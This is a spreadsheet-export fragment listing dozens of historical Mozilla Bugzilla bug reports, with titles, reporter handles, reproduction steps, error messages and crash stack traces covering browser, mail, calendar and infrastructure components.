    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b3) Gecko/20050710 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b3) Gecko/20050710 Firefox/1.0+
When 'Disable common annoyances' is turned on JavaScript is prevented from
focusing iframes within the page - even though it is permitted to focus other
controls within a page such as edit boxes. 
Since iframes are often used as a rich-text alternative to edit boxes this is
inconsistent.
Reproducible: Always
Steps to Reproduce:
1. Visit the above URL
2. Click in the iframe and click 'hello'
3. Click the Superscript button
4. Type 'world'
Actual Results:  
With 'Disable common annoyances' on focus remains on the Superscript button so
that 'world' does not appear in the edit box (iframe).
Expected Results:  
Focus should have returned to the edit box after step 3 and 'world' should
appear there (in superscript). This is what happens when 'Disable common
annoyances' is off.
I minimised this code as much as possible for the testcase (and to still
demonstrate why we need the functionality) but the relevant line is:
  setTimeout(function() {myframe.contentWindow.focus() }0)
(don't know why the setTimeout is there may just be for IE.)
Most likely this was categorised as 'common annoyances' in part of an attempt to
prevent JavaScript from changing the system focus top-level window (i.e.
focusing the current window every second so that the user can't do anything
else). However in this case the change is within a top-level window so it should
be allowed just as you're allowed to focus ordinary editboxes.</t>
  </si>
  <si>
    <t>s.marshall</t>
  </si>
  <si>
    <t>CORE-264501</t>
  </si>
  <si>
    <t xml:space="preserve"> in tables or blocks with display:table is calculated as 1px in the container width</t>
  </si>
  <si>
    <t>Mozilla 1.8a4 windows XP
1 put an image and a  in a table cell or a div with display:table
2 put a redbackground color on the container
expected result : total width is the width of the image
actual result : total width is the image width + 1px you see the red background
color on the right side
This is very annoying on all the sites using tables for layout of their images
testcase coming</t>
  </si>
  <si>
    <t>SEAMONKEY-123679</t>
  </si>
  <si>
    <t>Deleted bookmarks appear in search result window</t>
  </si>
  <si>
    <t>tested 2002-02-04-11-trunk
OS = Win 98 JA 4.10.1998
1. Launch Navigator
2. Access to http://www.nfl.com/
3. Add this page to bookmark from toolbar or menubar
4. Delete this page from book mark
5. To search this page select Manage bookmarks from toolbar or menubar
6. Select Edit/Find bookmarks or click Find in Sidebar/Bookmarks tab
7. Select name to first listbox select contains to second listbox
   then type nfl to input box click Find button
8. You will have deleted NFL.com in the search result window
Expected: deleted pages should not be searched.</t>
  </si>
  <si>
    <t>kasumi</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-42905</t>
  </si>
  <si>
    <t>Need error message when connection to server is lost.</t>
  </si>
  <si>
    <t>Overview Description:
When your internet connection dies no error message is given if you try to
continue like you were still connected.
Steps to Reproduce:
1) Start chatzilla
2) Join a channel
3) Somehow lose your net connection
4) Try to continue chatting
Actual Results:
It appears that you are still connected
Expected Results:
An error message should appear
Reproducibility:
everytime
Build Date &amp; Platform Bug Found:
Mozilla/5.0 (X11 U Linux 2.2.14-12 i686 en-US m16) Gecko/2000061611
Don't know if it matters but this is on dialup.
Additional Builds and Platforms Tested On:
none
Additional Information:
The best way to test this is to use another computer to observe the channel
while you disconnect the other.</t>
  </si>
  <si>
    <t>CORE-47852</t>
  </si>
  <si>
    <t>NAMESPACE_ERR not being thrown when setting Node.prefix</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US m18) Gecko/20000730
BuildID:    2000073020
If a Node.prefix is set when the Node.namespaceURI is null NAMESPACE_ERR should
be thrown.  Whenever an object (Document ELement etc) is created with a NS
method with a null namespaceURI and a prefix in the object's name then a
NAMESPACE_ERR should be thrown. With the exception of the CharacterData
interfaces (CDATASection Comment Text) NAMESPACE_ERR is not being thrown.
In addition if the xml or xmlns prefixes are used when creating an object then
specific namespaceURI *must* be used or else a NAMESPACE_ERR should be thrown.
This is not happening either.
Reproducible: Always
Steps to Reproduce:
1.  document.prefix = 0
    Expect NAMESPACE_ERR exception
    Actual NO_MODIFICATION_ALLOWED_ERR exception
2.  document.documentElement.prefix = 0
    Expect NAMESPACE_ERR exception
    Actual No Exception thrown
3.  document.implementation.createDocument(null 'x:y' null)
    Expect NAMESPACE_ERR
    Actual No Exception
4.  document.implementation.createDocument('http://baduri' 'xml:stuff' null)
    Expect NAMESPACE_ERR
    Actual No Exception
5.  document.implementation.createDocument('http://baduri' 'xmlns:stuff' null)
    Expect NAMESPACE_ERR
    Actual No Exception
I believe this to be a problem in the create...NS methods as well.
See: http://www.w3.org/TR/2000/CR-DOM-Level-2-20000510/core.html#ID-NodeNSPrefix</t>
  </si>
  <si>
    <t>SEAMONKEY-290175</t>
  </si>
  <si>
    <t>JS Error in permissionsNavigatorOverlay.xul</t>
  </si>
  <si>
    <t>When navigating through Tools menu you occasionally get an error in the JS
console with line 93 of permissionsNavigatorOverlay.xul</t>
  </si>
  <si>
    <t>TOOLKIT-510836</t>
  </si>
  <si>
    <t>mozce_shunt.dll loaded with updater.exe</t>
  </si>
  <si>
    <t>When updater.exe is launched I see the following in the console window for the emulator
CertVerify: \Storage Card\updater.exe trust = 2
CertVerify: mozce_shunt.dll trust = 2
If updater.exe loads mozce_shunt.dll then mozce_shunt.dll will be in use during update and won't be patched.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-332083</t>
  </si>
  <si>
    <t>expose interface xforms:select to control selection</t>
  </si>
  <si>
    <t>Now xforms:select binding defines interface property 'selectedIndex'. xforms:select[appearance='full'] doesn't implement it. Though I didn't know what 'selectedIndex' should return if xforms:select has some selected items. Probably it should return the first item of them. Maybe should xforms:select provide something more than just 'selectedIndex'?</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-357306</t>
  </si>
  <si>
    <t>Redirect needed for performance page to the wiki</t>
  </si>
  <si>
    <t>The content of http://www.mozilla.org/performance has been copied over to http://wiki.mozilla.org/Performance:Home_Page for easier updating.
The www.mozilla.org one one should be removed and a redirect put in place (in performance/.htaccess says dbaron) to redirect to the wiki page.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-229692</t>
  </si>
  <si>
    <t>Simplify nsMsgDBView::Sort and friends</t>
  </si>
  <si>
    <t>Basically there are two main changes:
1) Instead of storing dword values as an IdDWord of an EntryInfo and a PRUint32
I reuse the len field from the EntryInfo (now renamed IdDWord) structure.
2) Instead of having an EntryInfo member I derive the Key/PtrKey structures.</t>
  </si>
  <si>
    <t>CORE-176518</t>
  </si>
  <si>
    <t>[gtk2] focus is not automatically set to the url bar on startup</t>
  </si>
  <si>
    <t>When you start up the browser focus isn't set to anywhere in the browser
window requiring a mouse click in order to get focus anywhere.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-354239</t>
  </si>
  <si>
    <t>Talkback Server &amp; Webtool</t>
  </si>
  <si>
    <t>Need link to Firefox 1.5.0.7 release reports</t>
  </si>
  <si>
    <t>talkback-public needs a link to the Firefox 1.5.0.7 reports. The reports are there if you hand-munge 1.5.0.6 links into the obvious 1.5.0.7 equivalent just no top-level link.
The 1.5.0.7 link is there for Thunderbird. The private talkback-reports server also has the correct 1.5.0.7 link it's just missing on the public server.</t>
  </si>
  <si>
    <t>CORE-173069</t>
  </si>
  <si>
    <t>Default Plug-ins receive relative URLS</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0.1) Gecko/20020823 Netscape/7.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0.1) Gecko/20020823 Netscape/7.0
Default plug-ins can receive relative URLS for PLUGINURL and PLUGINPAGE
attributes.  This means the plug-in would have to resolve the URL itself. 
Plug-ins are not initialized with the URL they are embedded in and can receive
both absolute and relative URLS.  It would beneficial if the plug-in manager
resolved all relative URLs to absolute ones so plug-ins only have to handle one
scenario.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>peterl-bugs</t>
  </si>
  <si>
    <t>TaylorToddK</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-309019</t>
  </si>
  <si>
    <t>[l10n] CertificateDialogs.strings should be UTF-16</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b4) Gecko/20050914 Camino/1.0a1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b4) Gecko/20050914 Camino/1.0a1
File Encoding of CertificateDialogs.strings is UTF-8 at present and  Apple's
Localization Tools (AppleGlot) can't read it.
.strings file should be UTF-16 to use localization Tools.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>waveridervsnrz</t>
  </si>
  <si>
    <t>CORE-246061</t>
  </si>
  <si>
    <t>Trunk M18a1 crash [@ nsViewManager::DispatchEvent]</t>
  </si>
  <si>
    <t>latest talkback reports for the trunk
http://talkback-public.mozilla.org/reports/Trunk/smart-analysis.win  show a
possible regression for nsViewManager::DispatchEvent  
     Count   Offset    Real Signature
[ 23   nsViewManager::DispatchEvent a6000c62 - nsViewManager::DispatchEvent ]
     Crash date range: 08-JUN-04 to 08-JUN-04
     Min/Max Seconds since last crash: 45 - 1145639
     Min/Max Runtime: 21324 - 1145639
     Count   Platform List 
     23   [Windows NT 5.1 build 2600]   
     Count   Build Id List 
     22   2004052009
     1   2004051608
     No of Unique Users        19
 Stack trace(Frame) 
	 nsViewManager::DispatchEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsViewManager.cpp
 line 1946] 
	 HandleEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsView.cpp
 line 79] 
	 nsWindow::DispatchEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
 line 1071] 
	 nsWindow::DispatchWindowEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
 line 1088] 
	 nsWindow::DispatchMouseEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
 line 5209] 
	 ChildWindow::DispatchMouseEvent
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
 line 5460] 
	 nsWindow::ProcessMessage
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
 line 3937] 
	 nsWindow::WindowProc
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
 line 1350] 
	 USER32.dll + 0x3a50 (0x77d43a50)  
	 USER32.dll + 0x3b1f (0x77d43b1f)  
	 USER32.dll + 0x3d79 (0x77d43d79)  
	 USER32.dll + 0x3ddf (0x77d43ddf)  
	 nsAppShellService::Run
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/appshell/src/nsAppShellService.cpp
 line 524] 
	 main1
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp
 line 1312] 
	 main
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp
 line 1782] 
	 WinMain
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpfe/bootstrap/nsAppRunner.cpp
 line 1808] 
	 WinMainCRTStartup()  
	 kernel32.dll + 0x214c7 (0x77e814c7)   
     (81244)	URL: http://www.it.usyd.edu.au/~tapted/latex.html
     (81244)	Comments: Pressed back inside the frame at   
http://www.it.usyd.edu.au/~tapted/
     (80295)	URL: www.lyreco.be/olo
     (80295)	Comments: Logging out from Lyreco online ordering
     (80083)	Comments: used link included in mail in outlook client
     (79768)	Comments: Working with webmin  selecting a directory to backup
(Javascript window I guesS)</t>
  </si>
  <si>
    <t>DEVTOOLS-897960</t>
  </si>
  <si>
    <t>walker should support mozbrowser iframes</t>
  </si>
  <si>
    <t>This is working in the currently released Firefox but broken in Firefox Nightly.
When I open gaia inside of nightly and launch an App it's difficult to inspect those elements because the inspector will not jump to the right element.
My guess is that this might be somehow related to mozbrowser/mozapp iframes.</t>
  </si>
  <si>
    <t>WEBSITES-407288</t>
  </si>
  <si>
    <t>Missing Image on shipping page</t>
  </si>
  <si>
    <t>1) Put something in your cart and checkout (to get to http://intlstore.mozilla.org/checkout_payment.php)
2) This image is a 404:  http://intlstore.mozilla.org/includes/languages/english/images/buttons/button_redeem.gif and just says IMAGE_REDEEM_VOUCHER on the page (which isn't a good alt/title tag anyway)</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-473167</t>
  </si>
  <si>
    <t>increase the maximum time chrome scripts are allowed to run in the debug builds</t>
  </si>
  <si>
    <t>Created attachment 356528
v1
+++ This bug was initially created as a clone of Bug #453157 +++
This is a bug to land the changes from the bug 453157 separately from the rest of code. I nominate it as 1.9.1 blocker as the bug 453157 is itself is a blocker.
I self-approve the attached patch as this it is a verbatim copy of changes to build-related files from the bug 453157 comment 60.</t>
  </si>
  <si>
    <t>BUGZILLA-271913</t>
  </si>
  <si>
    <t>Don't force the user to comment when adding Hours Worked</t>
  </si>
  <si>
    <t>In the current implementation users are forced to enter a comment when 
changing the Hours Worked field even if they change nothing else. 
This is not in keeping with the Bugzilla design decisions to date that allow 
individual site-admins control over which changes require comments and which do 
not. I have already been asked to change this locally so I'll append my patch.</t>
  </si>
  <si>
    <t>mrbball17</t>
  </si>
  <si>
    <t>BUGZILLA-320902</t>
  </si>
  <si>
    <t>confirm-user-match is mean to IE</t>
  </si>
  <si>
    <t xml:space="preserve">user-agent: Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.0.3705 .NET CLR 1.1.4322)
steps:
1. try to ask 'medber' to review a patch
2. expected results: :bs as listed match
actual results:
:bs isn't listed by ie because the html generated by bugzilla allows IE to decide to omit it.
here's the bogus html (the html can be seen in Links too):
              medber
                      matched:
                    &lt;select name=requestee_type-5
                     id=requestee_type-5
                        Benjamin Smedberg  [:bs] (bsmedberg) benjaminsmedbergs.us                        
                        bsmedberg's watcher email (cc benjamin  smedbergs.us not this one) bsmedberggmail.com                        </t>
  </si>
  <si>
    <t>CALENDAR-337712</t>
  </si>
  <si>
    <t>Multiple CalDAV violations and misbehaviour of Lightning and Sunbird - both latest versions</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0)
Build Identifier: 0.3a2
1. Improper handling of the URL:
- Remote calendar is set to url: http://server/webdav
- If the CalDAV server returns in the REPORT response href of item as http://server/webdav/folder/itemid the CalDAV client has to repeat the same folder and itemid in every action on this item (DELETE PUT). Currently it uses only the itemid. Also the DELETE always appends .ics although the server did not return it in its response
Both reproducable in Lightning and Sunbird
2. Lightning (latest version March) does not display tasks (TODO)
- The server sends them but Lightning fails in calDAVCalendar.js in the icalString assignment:
                debug(item result = \n + calData + \n)
                // XXX try-catch
                item.icalString = calData
                item.calendar = thisCalendar
Always reproducable. Events work fine. Error returned:
Error: [Exception... 'Illegal value' when calling method: [calIEvent::icalString]  nsresult: 0x80070057 (NS_ERROR_ILLEGAL_VALUE)  location: JS frame :: file:///C:/Documents%20and%20Settings/Jakub/Application%20Data/Thunderbird/Profiles/3ikp5zav.default/extensions/%7Be2fda1a4-762b-4020-b5ad-a41df1933103%7D/components/calDavCalendar.js :: anonymous :: line 554  data: no]
Source File: file:///C:/Documents%20and%20Settings/Jakub/Application%20Data/Thunderbird/Profiles/3ikp5zav.default/extensions/%7Be2fda1a4-762b-4020-b5ad-a41df1933103%7D/components/calDavCalendar.js
Line: 554
The VTODO has correct format and is identical to the one Lightning uses when PUTting the item to the server.
3. No items (Events and Todos) displayed in Sunbird 0.3a2
Items are properly sent from the CalDAV server but Sunbird does not display them. Previous version 0.3a1 worked fine. I'm aware of the calendar-data CalDAV draft change and the CalDAV server supports both formats (the old and the new one). It is not in the format. Notice Lightning is working also using the latest CalDAV draft.
The console reports these 2 problems:
Error: [Exception... 'Component does not have requested interface' when calling method: [nsIInterfaceRequestor::getInterface]  nsresult: 0x80004002 (NS_NOINTERFACE)  location:   data: no]
Security Error: Content at moz-nullprincipal:{fe8ea01a-023f-470a-bae2-b50af3416f62} may not load or link to about:blank.
Always reproducable.
Reproducible: Always
I am sorry for submitting all of them as 1 bug. I feel they are all related</t>
  </si>
  <si>
    <t>CORE-315250</t>
  </si>
  <si>
    <t>Attempt to use inaccessible property Error in parsing value for property is confusing wording</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Load a page containing * { margin-left-value: 5 }
Result: Error: Attempt to use inaccessible property Error in parsing value for property 'margin-left-value'.
Expected: An error message that's easier to understand or at least easier to parse into English.  Error: Attempt to use inaccessible property 'margin-left-value'. would work.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-463222</t>
  </si>
  <si>
    <t>Allow MoMo build boxes to submit data to graphs-stage.mozilla.org</t>
  </si>
  <si>
    <t>Currently the MoMo build boxes outside MoCo's build network are getting 401 Permission denied errors when trying to submit data to the graph server (graphs.mozilla.org).
Given that we now have stable build boxes for all platforms it would be nice to be able to get graphs. So assuming this is a network access control all MoMo build boxes would be seen as coming from:
out.sj.mozillamessaging.com (63.245.221.200)
For simplicity might be simpler to grant access a little wider (or for *.mozillamessaging.com) but this IP should do for now.</t>
  </si>
  <si>
    <t>THUNDERBIRD-492951</t>
  </si>
  <si>
    <t>Folder unread counts not updating correctly until moused over</t>
  </si>
  <si>
    <t>Tested on: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b5pre) Gecko/20090513 Lightning/1.0pre Shredder/3.0b3pre
Steps to repeat:
1) Have some new mail in newsgroup read it (using space to advance through messages and having it automatically marked as read)
2) Get to the last message and read the last message
Result:
- Folder Pane still says 1 new message space doesn't select more messages or asks to go onto the next folder.
Moving the folder pane or selecting another message fixes it.
Alternate steps to repeat:
1) Have some new mail in newsgroup select the newsgroup
2) Right click -&gt; Mark as read.
Result:
- Folder pane still says the original number of unread messages as per step 1.
Moving the folder pane or selecting another message fixes it.</t>
  </si>
  <si>
    <t>CORE-205921</t>
  </si>
  <si>
    <t>Preference browser.cache.disk_cache_ssl  does nothing</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030512
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030512
Preference browser.cache.disk_cache_ssl has no impact on persitently caching
https pages.
Reproducible: Always
Steps to Reproduce:
1. Open about:configure and change browser.cache.disk_cache_ssl to true
2. Load a https://... page
3. Check your disk cache (about:cache?device=disk)
Actual Results:  
The https page should(?) be in the disk cache.
Expected Results:  
The https page is only in the memory-cache.
Is this the intented behaviour ? A search for disk_cache_ssl on
lxr.mozilla.org gives no results and no mention of such an option is made in the
nsHttpChannel class. It would be however nice to have especially for
embedding purposes.
IE has a similar working option (which is inadvertently set on true by default).
Implementing it would require some simple changes in the nsHttpChannel class (am
I wrong ?) that I would gladly make. The default setting
browser.cache.disk_cache_ssl = false is surely the right thing to do but some
embedding applications might be interested in caching https urls which is
impossible at present.</t>
  </si>
  <si>
    <t>ttudor</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-470359</t>
  </si>
  <si>
    <t>Ignore coming and goings of talos machines when watching tinderbox waterfalls</t>
  </si>
  <si>
    <t>Created attachment 353770
Ignore them I say
We're getting quite a bit of nagios mail about talos machines that fall off tinderbox waterfalls then rejoin a bit later. This happens particularly on weekends and other quiet times when there are less builds to be tested. 
Alice and Chris now have nagios monitoring setup so we know when a talos machine is not responding to PING. This patch tells the waterfall check to ignore talos when the -n switch is used which is currently Firefox Firefox3.1 and Tracemonkey (ie buildbot driven trees where we don't care about the coming and going of nightly builders). The only thing I'd worry about is if there are fail states where boxes respond to ping but aren't testing.
The checks that use this script run on surf which is automatically updating it from cvs.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-301082</t>
  </si>
  <si>
    <t>xpcom-shutdown is too late to destroy cached compose windows</t>
  </si>
  <si>
    <t>As mentioned in  bug 137698 if cached composition window is enabled on linux
there are gtk errors when exiting:
(Gecko:19985): Gtk-CRITICAL **: gtk_widget_destroy: assertion `GTK_IS_WIDGET
(widget)' failed
(Gecko:19985): Gtk-CRITICAL **: gtk_main_quit: assertion `main_loops != NULL' failed
nsAppStartup::Quit looks for other windows (via nsIWindowMediator) and attempts
to close them but it doesn't see the cached compose window.
Later when nsMsgComposeService gets shut down it closes its cached window
which triggers another call to nsAppStartup::Quit.  Things go south from there.
I'll attach a stack for the last call to nsAppStartup::Quit</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-121420</t>
  </si>
  <si>
    <t>vertalen: Help | composer_help.html</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-506849</t>
  </si>
  <si>
    <t>Omnibus ad-blocking bug for August 2009</t>
  </si>
  <si>
    <t>This bug brought to you by these fine sponsors:</t>
  </si>
  <si>
    <t>SEAMONKEY-176499</t>
  </si>
  <si>
    <t>Offline: Work Offline menu does not toggle back from Work Online</t>
  </si>
  <si>
    <t>mozilla 1.2b stays offline once the offline mode
was selected (file menu). 
OS: MacOSX 10.1.5</t>
  </si>
  <si>
    <t>CORE-206338</t>
  </si>
  <si>
    <t>Improve txStack</t>
  </si>
  <si>
    <t>txStack could be improved wrt speed. First of all we should mark all functions
as inline. Second we should not be calling non-inlined functions in nsVoidArray
when all they do is to call some other function AppendElement is one example of
this. Third we should look into removing the empty-stack-safety-check in pop()
and peek() and add it in the few places where the stack might be empty.</t>
  </si>
  <si>
    <t>CORE-370952</t>
  </si>
  <si>
    <t>Fix the reflow functions in nsPresShell</t>
  </si>
  <si>
    <t>The current system of having four different ways to enter frame reflow (including three which as almost identical) is completely ridiculous.
There should be one path to reflow frames and insert content.  That path should deal with all special cases.
InitialReflow is bad because it assumes there will be a root content node when it is called and breaks if there isn't (for example bug 370812). All the things it needs to do should be moved elsewhere.  (We might need some sort of to replace some calls to InitialReflow().)
Proposed changes:
In general all reflows should go through ProcessReflowCommands.
The following are the changes needed to make all reflows go through ProcessReflowCommands.
Fixing InitialReflow:
1. The root frame (the viewport) is constructed upon initialization of the PresShell.
2. The frame constructor should deal with any special frame construction handling needed for inserting/removing the root content of the document.
3. The frame constructor should notify the presshell when it creates a root scroll frame so that the presshell can register the appropriate listeners.
4. Content notifications shouldn't be suppressed before the initial reflow.
5. Reflow requests shouldn't be suppressed before the initial reflow.
6. The frame constructor should notify the presshell the first time it costructs a non-root frame so that the presshell can start the paint suppression timer.
OR
6. The content sink should notify the presshell at some point during the document load.
7. nsDocumentViewer should unconditionally SetVisibleArea.
8. If there is already a root content node in nsPresShell::Init force frame construction to occur.
9. Replace InitialReflow with a method to start the paint suppression timer.
Essentially the idea is that the initial reflow shouldn't be a special case since there's nothing that makes it fundamentally different from any other reflow.  This part's a bit complicated but I think it's significantly better than what we have now.
Fixing ResizeReflow:
ResizeReflow() simply sets the size of the viewport in the prescontext sets a resize reflow notification on the root frame and possibly flushes reflow.
Fixing StyleChangeReflow:
StyleChangeReflow() simply sets a style change notification on the root frame and possibly flushes reflow.
No patch yet just thoughts.</t>
  </si>
  <si>
    <t>CORE-331436</t>
  </si>
  <si>
    <t>__builtin_frame_address(0) doesn't work anymore</t>
  </si>
  <si>
    <t>So between the compilers on Fedora Core 4 and Fedora Core 5 __builtin_frame_address(0) which we started using extensively for our debugging tools in the patches to bug 323853 stopped working.  Instead of pointing to the saved frame pointer on the stack it points to the last of the saved registers on the stack which varies by function.
So I can work around it by throwing bp += 3 in DumpStackToFile and ++bp in jprof's equivalent but that doesn't seem satisfactory.
I could use inline assembler as in attachment 210815.
I'd also like to understand why this changed so I can know how to ifdef any fixes if necessary.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-202116</t>
  </si>
  <si>
    <t>DBI-&gt;connect using 'old-style' syntax is deprecated and will be an error in future versions at globals.pl line 114</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.3) Gecko/20030314
Build Identifier: Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.3) Gecko/20030314
Bonsai version 1.3
DBI-1.35
DBD-mysql-2.1026
perl-5.8.0
Reproducible: Always
Steps to Reproduce:
1. Install bonsai with DBI-1.35
2. load cvsqueryform.cgi
3. At bottom of the form there will be message:
Software error:
DBI-&gt;connect using 'old-style' syntax is deprecated and will be an error in
future versions at globals.pl line 114</t>
  </si>
  <si>
    <t>uros</t>
  </si>
  <si>
    <t>TOOLKIT-289695</t>
  </si>
  <si>
    <t>Form Manager</t>
  </si>
  <si>
    <t>nsFormHistory.cpp nsAutoVoidArray should call PR_Free on matchingValues and not delete it.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050409 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050409 Firefox/1.0+
In mozilla\toolkit\components\satchel\src\nsFormHistory.cpp:
Line 790: delete (PRUnichar *) matchingValues[i]
but while filling matchingValues with values we actually call:
AppendElement-&gt;InsertElementAt:
nsVoidArray.cpp (InsertElementAt):
394   if (oldCount &gt;= GetArraySize())
395   {
396     if (!GrowArrayBy(1))
397       return PR_FALSE
398   }
Then we go to GrowArrayBy which calls nsAutoVoidArray::SizeTo which
calls...nsVoidArray::SizeTo
in nsVoidArray::SizeTo we have:
186     char* bytes = (char *) PR_Realloc(mImplSIZEOF_IMPL(aSize))
-or-
214     char* bytes = (char *) PR_Malloc(SIZEOF_IMPL(aSize))
Which uses malloc and realloc which come from the malloc family after all.
AFAIK this is a very easy fix: just change delete matchingValues[i] to
free(matchingValues[i])
Reproducible: Always
Steps to Reproduce:
Leak detected with BoundsChecker Version 7.2.0</t>
  </si>
  <si>
    <t>itay.perl</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-360256</t>
  </si>
  <si>
    <t>First run page for latest Firefox 1.5.0.x doesn't say You have updated to the latest version</t>
  </si>
  <si>
    <t>When I updated a 1.5.0.7 install to 1.5.0.8 the first launch page (at the URL) didn't say I had the latest version just that I had updated. The in-page javascript is currently testing for Firefox/2.0 instead of Firefox/1.5.0.8
From a brief look Firefox 2.0 is using a different page
  http://en-us.www.mozilla.com/en-US/firefox/2.0/whatsnew</t>
  </si>
  <si>
    <t>SEAMONKEY-420477</t>
  </si>
  <si>
    <t>Missing viewport scrollbars viewport has padding and other major UI problems in latest nightly</t>
  </si>
  <si>
    <t>Regression window: 2008022901 -- 20080030101
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2008-02-29+00%3A00&amp;maxdate=2008-03-01+02%3A00&amp;cvsroot=%2Fcvsroot</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-436408</t>
  </si>
  <si>
    <t>Change the layout of the IT request format to better highlight the internal checkbox</t>
  </si>
  <si>
    <t>There are several bugs a day pasted in IRC channels regarding website updates SQL and routine things that should be public and are of interest to webdev in general yet they are in the infra group because someone either forgot to uncheck the box or doesn't understand that they _should_ uncheck the box for such things in almost all circumstances.
I don't know how many of the bugs filed should actually be marked infra as I can't see them but I think the default of the box should be unchecked the warning changed to something like If this is an internal issue such as _____________ please check this box and that the box should be moved to the bottom above submit where it is more noticeable.
I guess it would add a slight risk that someone would file an IT request publicly that should be marked infra but we take the same risk with security bugs not automatically being marked as security sensitive until someone that understands the issue reviews it.
Alternative solutions that are less open in general:
- Adding webdev to infra group
- Changing the associated group from infra back to mozillaorgconfidential and any super secret infra bugs can be marked as such by infra.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-187819</t>
  </si>
  <si>
    <t>Cleanup nsImageWin::Draw</t>
  </si>
  <si>
    <t>nsImageWin::Draw can be in a much more readable state with a bit of code
formatting.  Plus I think I see some dead code in there.</t>
  </si>
  <si>
    <t>CORE-285597</t>
  </si>
  <si>
    <t>Implement Get/SetProperty for nsIAttribute</t>
  </si>
  <si>
    <t>We should let nsIAttribute implement Get/SetProperty() etc. just as nsIContent.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-434028</t>
  </si>
  <si>
    <t>favicon for blog.mozilla.com is the default one for wordpress MU</t>
  </si>
  <si>
    <t>Would be great to replace the default wordpress MU favicon that's showing at the top level for http://blog.mozilla.com with a custom mozilla one. Polvi: any suggestions?</t>
  </si>
  <si>
    <t>pkim</t>
  </si>
  <si>
    <t>CALENDAR-276522</t>
  </si>
  <si>
    <t>setting icalComponent on an event shouldn't update lst-modified</t>
  </si>
  <si>
    <t>When setting icalComponent on an event the last-modified field gets updated to
the current time. They should not change since parsing doesn't actually change
anything.</t>
  </si>
  <si>
    <t>SEAMONKEY-281645</t>
  </si>
  <si>
    <t>#sidebar-box line in pinstripe's sidebar.css is stripped by the preprocessor</t>
  </si>
  <si>
    <t>In sidebar.css of help.jar there is no line of URL. 
Therefore the following error messages come out in JavaScript Console when the
debug option is made effective and help is opened. 
JavaScript Console message:
Error: Expected identifier for pseudo-class or pseudo-element but found ' '. 
Ruleset ignored due to bad selector.
Source File: chrome://help/skin/sidebar.css
Line: 5
Perhaps the following definitions might have been treated as a comment. 
#sidebar-box {
If this is correct the same problem might be brought up also in other places. 
Mac OS X 10.3.7
